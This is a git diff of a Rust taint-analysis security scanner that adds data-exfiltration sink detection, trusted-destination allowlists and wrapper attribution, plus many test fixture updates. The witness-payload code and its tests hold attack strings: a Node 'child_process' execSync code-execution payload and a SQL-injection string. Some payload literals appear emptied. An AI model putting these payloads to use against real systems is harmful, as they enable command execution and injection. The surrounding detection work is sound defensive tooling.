exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), } } @@ -1591,6 +1593,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); let ctx = make_summary_ctx(&gs); @@ -1659,6 +1662,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); let ctx = make_summary_ctx(&gs); @@ -1727,6 +1731,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); let ctx = make_summary_ctx(&gs); @@ -1790,6 +1795,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); let ctx = make_summary_ctx(&gs); @@ -1853,6 +1859,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); let ctx = make_summary_ctx(&gs); @@ -2050,6 +2057,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); @@ -2128,6 +2136,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); @@ -2207,6 +2216,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); // Second "send", in ns B, also with same arity → ambiguous bare-name @@ -2236,6 +2246,7 @@ mod tests { field_points_to: Default::default(), 
return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); // Also register the type-qualified name so Attempt 1 can find it @@ -2265,6 +2276,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); @@ -2343,6 +2355,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); @@ -2423,6 +2436,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); insert_java_summary( @@ -2451,6 +2465,7 @@ mod tests { field_points_to: Default::default(), return_path_facts: smallvec::SmallVec::new(), typed_call_receivers: vec![], + param_to_gate_filters: vec![], }, ); // No "HttpClient.send" summary registered, disambiguation has 0 exact matches diff --git a/src/symex/witness.rs b/src/symex/witness.rs index 57a0fe99..d8574929 100644 --- a/src/symex/witness.rs +++ b/src/symex/witness.rs @@ -204,8 +204,15 @@ fn sink_cap(finding: &Finding, cfg: &Cfg) -> Cap { /// Select a witness payload string based on the vulnerability class. fn witness_payload(cap: Cap) -> &'static str { - // Check bits in priority order (most specific first) - if cap.intersects(Cap::CODE_EXEC) { + // Check bits in priority order (most specific first). + // + // `DATA_EXFIL` is checked before the action-class caps (CODE_EXEC, SQL, + // etc.) because a data-exfil sink reflects what the *attacker reads*, + // not what they *do*: the witness needs to look like a leaked secret + // ("") rather than an injected payload ("' OR 1=1 --"). 
+ if cap.intersects(Cap::DATA_EXFIL) { + "" + } else if cap.intersects(Cap::CODE_EXEC) { "require('child_process').execSync('id')" } else if cap.intersects(Cap::HTML_ESCAPE) { "" @@ -639,9 +646,21 @@ mod tests { witness_payload(Cap::DESERIALIZE), "malicious_serialized_object" ); + assert_eq!(witness_payload(Cap::DATA_EXFIL), ""); assert_eq!(witness_payload(Cap::CRYPTO), "TAINTED"); // fallback } + #[test] + fn test_witness_payload_data_exfil_wins_over_action_caps() { + // A `fetch` call's body slot can carry both DATA_EXFIL (the leak + // class) and the underlying action cap (e.g. SSRF) when the same + // sink is multi-gated. The witness should reflect the *leaked* + // value (a session token) rather than an injection payload, the + // attacker is reading data, not writing it. + let combined = Cap::DATA_EXFIL | Cap::SSRF; + assert_eq!(witness_payload(combined), ""); + } + #[test] fn test_witness_payload_code_exec_separate_from_xss() { // CODE_EXEC must return a code-execution payload, not an XSS one. 
@@ -776,6 +795,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let finding = Finding { @@ -831,6 +852,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let cfg = Cfg::new(); let finding = Finding { @@ -892,6 +915,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let finding = Finding { @@ -954,6 +979,8 @@ mod tests { exception_edges: vec![], field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + + synthetic_externals: std::collections::HashSet::new(), }; let finding = Finding { diff --git a/src/taint/backwards.rs b/src/taint/backwards.rs index a91f0c57..8294c0c1 100644 --- a/src/taint/backwards.rs +++ b/src/taint/backwards.rs @@ -752,6 +752,7 @@ mod tests { exception_edges: Vec::new(), field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + synthetic_externals: std::collections::HashSet::new(), }; (ssa, cfg) @@ -766,6 +767,47 @@ mod tests { assert_eq!(d.validated_false, 0); } + /// Regression guard: the cap-routing logic must round-trip + /// `Cap::DATA_EXFIL` exactly like every other cap. The backwards + /// engine treats the demand as opaque bits, so if a future change + /// accidentally narrows the type of `caps` (e.g. a hardcoded mask) + /// the data-exfiltration cap stops surviving the walk. 
+ #[test] + fn demand_state_roundtrips_data_exfil_cap() { + let d = DemandState::new(Cap::DATA_EXFIL); + assert_eq!(d.caps, Cap::DATA_EXFIL); + assert!(d.caps.contains(Cap::DATA_EXFIL)); + // Sanity: combined demand keeps the bit alongside SSRF (the two + // most-frequently-co-occurring caps on outbound HTTP gates). + let combined = DemandState::new(Cap::DATA_EXFIL | Cap::SSRF); + assert!(combined.caps.contains(Cap::DATA_EXFIL)); + assert!(combined.caps.contains(Cap::SSRF)); + } + + /// The backwards driver must classify a `DATA_EXFIL`-capable source + /// even when the sink demand is *exactly* `DATA_EXFIL` (no other + /// caps). Mirrors `driver_walks_source_to_sink` but pins the cap so + /// a future change that intersects with a wider mask (and thus + /// silently widens the demand) is caught. + #[test] + fn driver_walks_data_exfil_source_to_sink() { + let (ssa, mut cfg) = build_trivial_source_body(); + // Tag the source CFG node with a Source(DATA_EXFIL) label so + // the cap-match path (the one that actually rules end-to-end + // routing) exercises the bit. 
+ let src_node = NodeIndex::new(0); + cfg[src_node] + .taint + .labels + .push(DataLabel::Source(Cap::DATA_EXFIL)); + + let ctx = BackwardsCtx::new(&ssa, &cfg, Lang::JavaScript); + let flows = analyse_sink_backwards(&ctx, SsaValue(1), NodeIndex::new(1), Cap::DATA_EXFIL); + assert_eq!(flows.len(), 1, "exactly one DATA_EXFIL flow expected"); + assert!(flows[0].is_confirmation(), "must confirm at the source"); + assert_eq!(flows[0].sink_caps, Cap::DATA_EXFIL); + } + #[test] fn backward_transfer_source_terminates() { let (ssa, _cfg) = build_trivial_source_body(); @@ -800,6 +842,7 @@ mod tests { exception_edges: Vec::new(), field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + synthetic_externals: std::collections::HashSet::new(), }; let demand = DemandState::new(Cap::all()); let (step, next) = backward_transfer(&ssa, SsaValue(0), &demand); @@ -832,6 +875,7 @@ mod tests { exception_edges: Vec::new(), field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + synthetic_externals: std::collections::HashSet::new(), }; let demand = DemandState::new(Cap::all()); let (step, _next) = backward_transfer(&ssa, SsaValue(0), &demand); @@ -919,6 +963,7 @@ mod tests { exception_edges: Vec::new(), field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + synthetic_externals: std::collections::HashSet::new(), }; let demand = DemandState::new(Cap::all()); @@ -1007,6 +1052,7 @@ mod tests { exception_edges: Vec::new(), field_interner: crate::ssa::ir::FieldInterner::default(), field_writes: std::collections::HashMap::new(), + synthetic_externals: std::collections::HashSet::new(), }; let ctx = BackwardsCtx::new(&ssa, &cfg, Lang::JavaScript); diff --git a/src/taint/ssa_transfer/mod.rs b/src/taint/ssa_transfer/mod.rs index f844e7ea..a893d512 100644 --- a/src/taint/ssa_transfer/mod.rs +++ b/src/taint/ssa_transfer/mod.rs @@ -4026,6 +4026,45 @@ 
pub(super) fn transfer_inst( } } + // Constructor cap narrowing: a `new X(...)` call returns an object + // instance, not a string. Caps that name a string-shaped sink + // pattern (path argument, format string, URL component, JSON + // input) cannot fire on a wrapper object, so they must not + // survive the construction. Without this narrowing, a tainted + // argument to `new SdkClient(secret)` propagates `Cap::all()` + // into the wrapper, every method call on the wrapper inherits + // those bits via receiver propagation, and any downstream + // `fs.write*` / `printf` / `JSON.parse` on a string property + // returned by an SDK method (e.g. `client.create().id`) flags + // a phantom flow that has no real path-traversal etc. payload. + // + // Caps preserved (legitimately travel through wrappers): + // - SHELL_ESCAPE / SQL_QUERY / CODE_EXEC / DESERIALIZE: a + // wrapper that captures a tainted command/query string can + // replay it via methods, the bit must survive the wrap. + // - SSRF / DATA_EXFIL: URL/payload concerns persist on URL or + // content-bearing objects. + // - UNAUTHORIZED_ID: ownership obligation persists on a + // wrapper that carries a request-bound identifier. + // - ENV_VAR: provenance marker, never a sink trigger by + // itself. + // - HTML_ESCAPE: kept for safety, conservative dual concern + // (a wrapper used as a string in template rendering). + // - CRYPTO: kept conservatively. + // + // Caps stripped on construction: + // - FILE_IO: path strings only. + // - FMT_STRING: printf-style format args only. + // - URL_ENCODE: URL components only. + // - JSON_PARSE: parser inputs only. 
+ if info.call.is_constructor && !return_bits.is_empty() { + let strip = Cap::FILE_IO | Cap::FMT_STRING | Cap::URL_ENCODE | Cap::JSON_PARSE; + return_bits &= !strip; + if return_bits.is_empty() { + return_origins.clear(); + } + } + // Write result if return_bits.is_empty() { state.remove(inst.value); @@ -4314,16 +4353,41 @@ pub(super) fn transfer_inst( // summary-extraction mode so baseline probes keep their // intrinsic-source contract. Gate is set by the caller, e.g. // always-on for JS/TS, only AnonymousFunction bodies for Java. + // + // The `Param` branch fires for both real formal parameters and + // synthetic externals injected by lowering for free / closure- + // captured variables (`SsaBody.synthetic_externals`). Only real + // formals should receive the heuristic seed: a closure capturing + // an out-of-scope `userId` / `cmd` / `payload` is NOT a handler + // entry point — the variable is supplied by the enclosing scope + // and seeding it here produces phantom sources anchored to the + // function's declaration line. if transfer.auto_seed_handler_params && !seeded_from_scope && matches!(&inst.op, SsaOp::Param { .. }) + && !ssa.synthetic_externals.contains(&inst.value) { if let Some(var_name) = ssa .value_defs .get(inst.value.0 as usize) .and_then(|vd| vd.var_name.as_deref()) { - if crate::labels::is_js_ts_handler_param_name(var_name) { + // Direct match: the Param's name itself is a handler + // identifier (e.g. `input`, `cmd`, `userId`). + // + // Root-prefix match: dotted-path Params produced by + // lowering for member-expression uses inside the body + // (`input.cmd` — an unbacked phantom Param) inherit the + // seed when their *root* is a handler-param formal. + // Without this, the field-aware suppression downstream + // sees `input.cmd` as a "clean field" and strips + // `input`'s taint, even though `input.cmd` is just a + // structural projection of the auto-seeded formal. 
+ let root_is_handler = var_name + .split_once('.') + .map(|(root, _)| crate::labels::is_js_ts_handler_param_name(root)) + .unwrap_or(false); + if crate::labels::is_js_ts_handler_param_name(var_name) || root_is_handler { let origin = TaintOrigin { node: inst.cfg_node, source_kind: SourceKind::UserInput, @@ -5245,6 +5309,15 @@ fn collect_block_events( let sink_info = resolve_sink_info(info, transfer); let mut sink_caps = sink_info.caps; + // [detectors.data_exfil] enabled toggle. When the detector class is + // disabled per-project, strip Cap::DATA_EXFIL from sink_caps so no + // taint-data-exfiltration event is emitted regardless of which gate + // would have fired. Strict-additive: defaults to enabled, no effect + // for projects that don't opt in. + if !crate::utils::detector_options::current().data_exfil.enabled { + sink_caps &= !Cap::DATA_EXFIL; + } + // Type-qualified sink resolution: when normal sink resolution found nothing, // try using the receiver's inferred type to construct a qualified callee name. if sink_caps.is_empty() { @@ -5324,50 +5397,83 @@ fn collect_block_events( for &(cb_idx, src_caps) in &resolved.source_to_callback { let cb_name = info.arg_callees.get(cb_idx).and_then(|ac| ac.as_ref()); if let Some(cb_callee) = cb_name { - if let Some(cb_resolved) = - resolve_callee(transfer, cb_callee, caller_func, 0) - { - let matching_sink_caps = cb_resolved - .param_to_sink - .iter() - .filter(|(_, caps)| !(src_caps & *caps).is_empty()) - .fold(Cap::empty(), |acc, (_, c)| acc | *c); - if !matching_sink_caps.is_empty() { - let source_kind = - crate::labels::infer_source_kind(src_caps, callee); - let origin = TaintOrigin { - node: inst.cfg_node, - source_kind, - source_span: None, - }; - // Pick callback-path sink sites. - // The callback callee's `param_to_sink_sites` - // drives attribution when available; cap-only - // fallback yields `primary_sink_site = None`. 
- let cb_tainted: Vec<( - SsaValue, - Cap, - SmallVec<[TaintOrigin; 2]>, - )> = vec![( + // First try the standard summary-based resolution + // path (covers user-defined functions and built-ins + // that landed in label-derived summaries upstream). + // If that yields no matching sink caps, fall back + // to gated-sink classification on the callback + // callee's name — gated sinks (e.g. + // `child_process.exec` post-fix) carry their + // payload positions in the gate, not in any + // summary, and the callback pipeline still needs + // those positions to pair source caps against + // param_to_sink. + let cb_resolved = resolve_callee(transfer, cb_callee, caller_func, 0); + let mut matching_sink_caps = Cap::empty(); + let cb_param_to_sink_sites: Vec<(usize, SmallVec<[SinkSite; 1]>)> = + if let Some(ref r) = cb_resolved { + matching_sink_caps = r + .param_to_sink + .iter() + .filter(|(_, caps)| !(src_caps & *caps).is_empty()) + .fold(Cap::empty(), |acc, (_, c)| acc | *c); + r.param_to_sink_sites.clone() + } else { + vec![] + }; + if matching_sink_caps.is_empty() { + // Gate-fallback: classify_gated_sink yields the + // callback callee's payload positions + sink + // caps directly when the name matches a gated + // sink rule. + let lang_str = transfer.lang.as_str(); + let gates = crate::labels::classify_gated_sink( + lang_str, + cb_callee, + |_| None, + |_| None, + |_| false, + ); + for gm in gates.iter() { + if let DataLabel::Sink(bits) = gm.label { + if !(src_caps & bits).is_empty() { + matching_sink_caps |= bits; + } + } + } + } + if !matching_sink_caps.is_empty() { + let source_kind = + crate::labels::infer_source_kind(src_caps, callee); + let origin = TaintOrigin { + node: inst.cfg_node, + source_kind, + source_span: None, + }; + // Pick callback-path sink sites. + // The callback callee's `param_to_sink_sites` + // drives attribution when available; cap-only + // fallback yields `primary_sink_site = None`. 
+ let cb_tainted: Vec<(SsaValue, Cap, SmallVec<[TaintOrigin; 2]>)> = + vec![( inst.value, src_caps & matching_sink_caps, SmallVec::from_elem(origin, 1), )]; - let cb_sites = pick_primary_sink_sites_from_resolved( - matching_sink_caps, - &cb_resolved.param_to_sink_sites, - ); - emit_ssa_taint_events( - events, - inst.cfg_node, - cb_tainted, - matching_sink_caps, - false, - None, - true, - cb_sites, - ); - } + let cb_sites = pick_primary_sink_sites_from_resolved( + matching_sink_caps, + &cb_param_to_sink_sites, + ); + emit_ssa_taint_events( + events, + inst.cfg_node, + cb_tainted, + matching_sink_caps, + false, + None, + true, + cb_sites, + ); } } } @@ -5563,8 +5669,62 @@ fn collect_block_events( // loop with the legacy `(sink_caps, info.call.sink_payload_args, // info.call.destination_uses)` triple, preserving prior behavior // for every non-multi-gate site. + // + // Cross-file wrapper case: when the resolved callee summary carries + // [`SinkInfo::param_to_gate_filters`] (the wrapper's body contains + // an inner multi-gate sink whose per-position cap split was lifted + // at extraction time), expand one filter pass per `(param_idx, + // label_caps)` entry restricted to that single arg position. This + // preserves SSRF-vs-DATA_EXFIL attribution across a + // `fn forward(url, body) { fetch(url, {body}) }` wrapper that is + // NOT itself a known gated sink. + // + // Params NOT covered by `param_to_gate_filters` retain coverage + // via their `param_to_sink` entry, expanded per-position so the + // emitted event's `sink_caps` reflects the param-specific cap + // mask rather than the aggregate union. This matters for + // wrappers that mix gated sinks with label-based sinks + // (e.g. `fn dispatch(cmd, url) { execSync(cmd); fetch(url) }`), + // where param 0 reaches a non-gated SHELL_ESCAPE sink and the + // gate-filter list only carries the SSRF gate for param 1. 
let multi_gate = info.call.gate_filters.len() > 1; + let summary_per_position = !multi_gate && !sink_info.param_to_gate_filters.is_empty(); type FilterEntry<'a> = (Cap, Option<&'a [usize]>, Option<&'a [String]>); + // Per-position dispatch source for the summary-per-position branch. + // First, every entry from `param_to_gate_filters` (cap-narrowed by + // the inner gate); then, for any param_to_sink index NOT mentioned + // in `param_to_gate_filters`, an entry using that param's + // `param_to_sink` cap mask. + struct PerPosEntry { + idx: [usize; 1], + caps: Cap, + } + let per_position_entries: Vec<PerPosEntry> = if summary_per_position { + let mut out: Vec<PerPosEntry> = + Vec::with_capacity(sink_info.param_to_gate_filters.len()); + for (idx, caps) in &sink_info.param_to_gate_filters { + out.push(PerPosEntry { + idx: [*idx], + caps: *caps, + }); + } + for (idx, caps) in &sink_info.param_to_sink { + if sink_info + .param_to_gate_filters + .iter() + .any(|(i, _)| *i == *idx) + { + continue; + } + out.push(PerPosEntry { + idx: [*idx], + caps: *caps, + }); + } + out + } else { + Vec::new() + }; let filter_iter: smallvec::SmallVec<[FilterEntry<'_>; 2]> = if multi_gate { info.call .gate_filters @@ -5577,11 +5737,37 @@ fn collect_block_events( ) }) .collect() + } else if summary_per_position { + per_position_entries + .iter() + .map(|e| (sink_caps & e.caps, Some(e.idx.as_slice()), None)) + .collect() } else { smallvec::smallvec![(sink_caps, None, None)] }; for (filter_caps, positions_override, destination_override) in filter_iter { + let mut filter_caps = filter_caps; + + // Per-filter destination allowlist for DATA_EXFIL. When this + // filter would emit Cap::DATA_EXFIL and the call's destination + // arg has a trusted static prefix (configured via + // detectors.data_exfil.trusted_destinations), drop the bit + // for this filter only. Other gates on the same call site + // (notably SSRF) are unaffected.
Mirrors the semantics of + // is_call_data_exfil_destination_trusted but operates per-gate + // so a multi-gate fetch site keeps SSRF attribution while + // dropping DATA_EXFIL when the destination is trusted. + if filter_caps.intersects(Cap::DATA_EXFIL) { + if let SsaOp::Call { ref args, .. } = inst.op { + if let Some(ref abs) = state.abstract_state { + if is_call_data_exfil_destination_trusted(inst, args, abs, cfg) { + filter_caps &= !Cap::DATA_EXFIL; + } + } + } + } + if filter_caps.is_empty() { continue; } @@ -6464,6 +6650,15 @@ struct SinkInfo { /// coordinates. Used to attribute findings to the dangerous /// callee-internal instruction. param_to_sink_sites: Vec<(usize, SmallVec<[SinkSite; 1]>)>, + /// Per-parameter gate-filter cap masks lifted from the callee's + /// inner multi-gate sink call sites. Mirrors + /// [`crate::summary::ssa_summary::SsaFuncSummary::param_to_gate_filters`]. + /// When non-empty, the dispatcher in [`collect_block_events`] + /// expands one filter pass per `(param_idx, label_caps)` entry so + /// a wrapper carrying multiple gate classes (e.g. SSRF on the URL + /// arg + DATA_EXFIL on the body arg) attributes findings per cap + /// instead of joining them. 
+ param_to_gate_filters: Vec<(usize, Cap)>, } fn resolve_sink_info(info: &NodeInfo, transfer: &SsaTaintTransfer) -> SinkInfo { @@ -6479,6 +6674,7 @@ fn resolve_sink_info(info: &NodeInfo, transfer: &SsaTaintTransfer) -> SinkInfo { caps: label_sink_caps, param_to_sink: vec![], param_to_sink_sites: vec![], + param_to_gate_filters: vec![], }; } @@ -6500,6 +6696,7 @@ fn resolve_sink_info(info: &NodeInfo, transfer: &SsaTaintTransfer) -> SinkInfo { caps: r.sink_caps, param_to_sink: r.param_to_sink, param_to_sink_sites: r.param_to_sink_sites, + param_to_gate_filters: r.param_to_gate_filters, }; } @@ -6525,6 +6722,7 @@ fn resolve_sink_info(info: &NodeInfo, transfer: &SsaTaintTransfer) -> SinkInfo { caps: r.sink_caps, param_to_sink: r.param_to_sink, param_to_sink_sites: r.param_to_sink_sites, + param_to_gate_filters: r.param_to_gate_filters, }; } } @@ -6533,6 +6731,7 @@ fn resolve_sink_info(info: &NodeInfo, transfer: &SsaTaintTransfer) -> SinkInfo { caps: Cap::empty(), param_to_sink: vec![], param_to_sink_sites: vec![], + param_to_gate_filters: vec![], } } @@ -7383,6 +7582,16 @@ fn is_abstract_safe_for_sink( } } + // DATA_EXFIL, destination allowlist via configured trusted prefixes. + // Mirrors the SSRF prefix-lock above but consults the user-configured + // [detectors.data_exfil] table's trusted_destinations key. Strict- + // additive: when no destinations are configured this is a no-op. + if sink_caps.intersects(Cap::DATA_EXFIL) + && is_inst_data_exfil_destination_trusted(inst, abs, cfg) + { + return true; + } + // SHELL_ESCAPE, static-map finite-domain safety. When every tainted // payload value is proved by the static-HashMap-lookup analysis to come // from a bounded set of metacharacter-free literals, the call cannot @@ -7509,6 +7718,15 @@ fn is_call_abstract_safe( } } + // DATA_EXFIL, destination-allowlist match. Mirrors the SSRF arm above + // for the Call path. Strict-additive: a no-op when + // detectors.data_exfil.trusted_destinations is empty. 
+ if sink_caps.intersects(Cap::DATA_EXFIL) + && is_call_data_exfil_destination_trusted(inst, args, abs, cfg) + { + return true; + } + // SHELL_ESCAPE, static-map finite-domain safety on every non-empty arg // group. Mirrors the non-Call path so suppression fires regardless of // which branch the sink detector took. @@ -7785,6 +8003,118 @@ fn is_static_map_shell_safe( }) } +/// `DATA_EXFIL` destination-allowlist match. +/// +/// Returns `true` when `prefix` (the proven static prefix of an outbound +/// destination URL, sourced from either the abstract string domain or an +/// inline literal seen by CFG) starts with one of the user-configured +/// trusted destinations. Used by the abstract sink-suppression code to +/// drop the [`Cap::DATA_EXFIL`] bit on legitimate forwarding pipelines +/// (telemetry, internal APIs, analytics) without affecting other caps on +/// the same call. +/// +/// Match semantics: a trusted destination entry is treated as a string +/// prefix. An empty entry never matches (empty prefix would match +/// every URL, which is never a useful allowlist). Entries should be +/// origin-pinned (e.g. `https://api.internal/`) so partial-host +/// collisions cannot occur. +fn is_string_prefix_trusted_destination(prefix: &str, trusted: &[String]) -> bool { + if prefix.is_empty() { + return false; + } + trusted + .iter() + .any(|t| !t.is_empty() && prefix.starts_with(t.as_str())) +} + +/// Check whether the call site's destination argument (positional arg 0) is +/// a known trusted destination per +/// [`crate::utils::detector_options::DataExfilDetectorOptions::trusted_destinations`]. +/// +/// Returns `true` when the URL argument has a static prefix matching one +/// of the configured trusted entries. Three sources are consulted in +/// order: +/// +/// 1. The CFG node's syntactic literal (`info.call.arg_string_literals[0]`), +/// populated for any positional argument that is a syntactic string +/// literal at the call site. 
Catches the common case +/// `fetch('https://api.internal/...', {...})` whose URL never enters +/// the abstract domain because it is not bound to an identifier. +/// 2. The inline template-literal prefix attached to the call node +/// directly (matches the SSRF prefix-lock fallback). +/// 3. The abstract string-domain prefix of arg 0's SSA value group. +/// Catches identifier-bound URLs like +/// `let url = \`https://api.internal/${id}\`; fetch(url, {...})`. +/// +/// Returns `false` when no trusted destinations are configured. +fn is_call_data_exfil_destination_trusted( + inst: &SsaInst, + args: &[SmallVec<[SsaValue; 2]>], + abs: &AbstractState, + cfg: &Cfg, +) -> bool { + let opts = crate::utils::detector_options::current(); + let trusted = &opts.data_exfil.trusted_destinations; + if trusted.is_empty() { + return false; + } + let node_info = &cfg[inst.cfg_node]; + if let Some(Some(lit)) = node_info.call.arg_string_literals.first() { + if is_string_prefix_trusted_destination(lit, trusted) { + return true; + } + } + if let Some(prefix) = node_info.string_prefix.as_deref() { + if is_string_prefix_trusted_destination(prefix, trusted) { + return true; + } + } + if let Some(first_arg) = args.first() { + if !first_arg.is_empty() + && first_arg.iter().all(|v| { + abs.get(*v) + .string + .prefix + .as_deref() + .is_some_and(|p| is_string_prefix_trusted_destination(p, trusted)) + }) + { + return true; + } + } + false +} + +/// Non-Call variant of [`is_call_data_exfil_destination_trusted`]: used by +/// [`is_abstract_safe_for_sink`] where the destination is read off the +/// instruction's own used SSA values rather than a positional Call arg +/// list. Falls back to the node-attached `string_prefix` when no abstract +/// fact is available. 
+fn is_inst_data_exfil_destination_trusted(inst: &SsaInst, abs: &AbstractState, cfg: &Cfg) -> bool { + let opts = crate::utils::detector_options::current(); + let trusted = &opts.data_exfil.trusted_destinations; + if trusted.is_empty() { + return false; + } + let node_info = &cfg[inst.cfg_node]; + if let Some(prefix) = node_info.string_prefix.as_deref() { + if is_string_prefix_trusted_destination(prefix, trusted) { + return true; + } + } + let used = inst_use_values(inst); + if used.is_empty() { + return false; + } + used.iter().all(|v| { + abs.get(*v) + .string + .prefix + .as_deref() + .is_some_and(|p| is_string_prefix_trusted_destination(p, trusted)) + }) +} + /// SSRF safety: prefix includes scheme + full host + path separator. /// /// Soundness: if the prefix contains `scheme://host/`, the attacker cannot @@ -8026,6 +8356,21 @@ struct ResolvedSummary { /// retained; in that case `param_to_sink` alone still drives sink /// detection. param_to_sink_sites: Vec<(usize, SmallVec<[SinkSite; 1]>)>, + /// Per-parameter gate-filter cap masks lifted from the callee's + /// inner multi-gate sink call sites. Mirrors + /// [`crate::summary::ssa_summary::SsaFuncSummary::param_to_gate_filters`]. + /// + /// Each `(param_idx, label_caps)` entry says "this caller-side + /// parameter flows to a callee-internal gated sink whose narrowed + /// caps are `label_caps`". When non-empty, the multi-gate dispatch + /// in [`collect_block_events`] expands one filter pass per entry so + /// the emitted event's `sink_caps` reflect the gate-specific cap + /// rather than the aggregate union, preserving SSRF-vs-DATA_EXFIL + /// (and similar) attribution through wrapper functions. + /// + /// Empty for label, local-summary, FuncSummary, and interop paths, + /// these forms do not retain per-gate cap detail. + param_to_gate_filters: Vec<(usize, Cap)>, propagates_taint: bool, propagating_params: Vec, /// Parameter indices whose container identity flows to return value. 
@@ -8229,18 +8574,34 @@ fn resolve_callee_full( param_return_paths: vec![], points_to: Default::default(), field_points_to: Default::default(), + param_to_gate_filters: vec![], }); } - // Try label classification for the bound function (by leaf name) + // Try label classification for the bound function (by leaf name). + // Consult both flat rules (`classify_all`) and gated sinks: a + // callback bound to a gated sink (e.g. passing + // `child_process.exec` directly as the callback) still needs to + // surface its `Sink` capability so the source/callback pairing + // logic can match `param_to_sink` against the caller's source. + // The gate's `payload_args` translate directly into + // `param_to_sink` index entries. let labels = crate::labels::classify_all( transfer.lang.as_str(), &real_key.name, transfer.extra_labels, ); - if !labels.is_empty() { + let gate_matches = crate::labels::classify_gated_sink( + transfer.lang.as_str(), + &real_key.name, + |_| None, + |_| None, + |_| false, + ); + if !labels.is_empty() || !gate_matches.is_empty() { let mut source_caps = Cap::empty(); let mut sanitizer_caps = Cap::empty(); let mut sink_caps = Cap::empty(); + let mut param_to_sink: Vec<(usize, Cap)> = vec![]; for lbl in &labels { match lbl { DataLabel::Source(bits) => source_caps |= *bits, @@ -8248,11 +8609,25 @@ fn resolve_callee_full( DataLabel::Sink(bits) => sink_caps |= *bits, } } + for gm in gate_matches.iter() { + if let DataLabel::Sink(bits) = gm.label { + sink_caps |= bits; + // Map the gate's payload_args to per-param sink entries + // so source-to-callback pairing can match by index. + // Skip the dynamic-activation sentinel — without a + // concrete arity we can't enumerate positions here. 
+ if gm.payload_args != crate::labels::ALL_ARGS_PAYLOAD { + for &idx in gm.payload_args { + param_to_sink.push((idx, bits)); + } + } + } + } return Some(ResolvedSummary { source_caps, sanitizer_caps, sink_caps, - param_to_sink: vec![], + param_to_sink, param_to_sink_sites: vec![], propagates_taint: false, propagating_params: vec![], @@ -8270,6 +8645,7 @@ fn resolve_callee_full( param_return_paths: vec![], points_to: Default::default(), field_points_to: Default::default(), + param_to_gate_filters: vec![], }); } } @@ -8414,6 +8790,7 @@ fn resolve_callee_full( param_return_paths: vec![], points_to: Default::default(), field_points_to: Default::default(), + param_to_gate_filters: vec![], }); } } else { @@ -8463,6 +8840,7 @@ fn resolve_callee_full( param_return_paths: vec![], points_to: Default::default(), field_points_to: Default::default(), + param_to_gate_filters: vec![], }; match widened.len() { 0 => {} @@ -8533,6 +8911,7 @@ fn resolve_callee_full( param_return_paths: vec![], points_to: Default::default(), field_points_to: Default::default(), + param_to_gate_filters: vec![], }); } } @@ -8714,6 +9093,7 @@ fn convert_ssa_to_resolved_for_caller( param_return_paths: ssa_sum.param_return_paths.clone(), points_to: ssa_sum.points_to.clone(), field_points_to: ssa_sum.field_points_to.clone(), + param_to_gate_filters: ssa_sum.param_to_gate_filters.clone(), } } @@ -8810,6 +9190,20 @@ fn merge_resolved_summaries_fanout( } } + // param_to_gate_filters: dedup-union (idx, caps) pairs. Each + // implementer may carry its own per-position cap split; the union + // preserves cap attribution from any implementer reachable via + // virtual dispatch. + for (idx, caps) in r.param_to_gate_filters { + if !acc + .param_to_gate_filters + .iter() + .any(|&(i, c)| i == idx && c == caps) + { + acc.param_to_gate_filters.push((idx, caps)); + } + } + // SSA-precision fields: drop on any disagreement. 
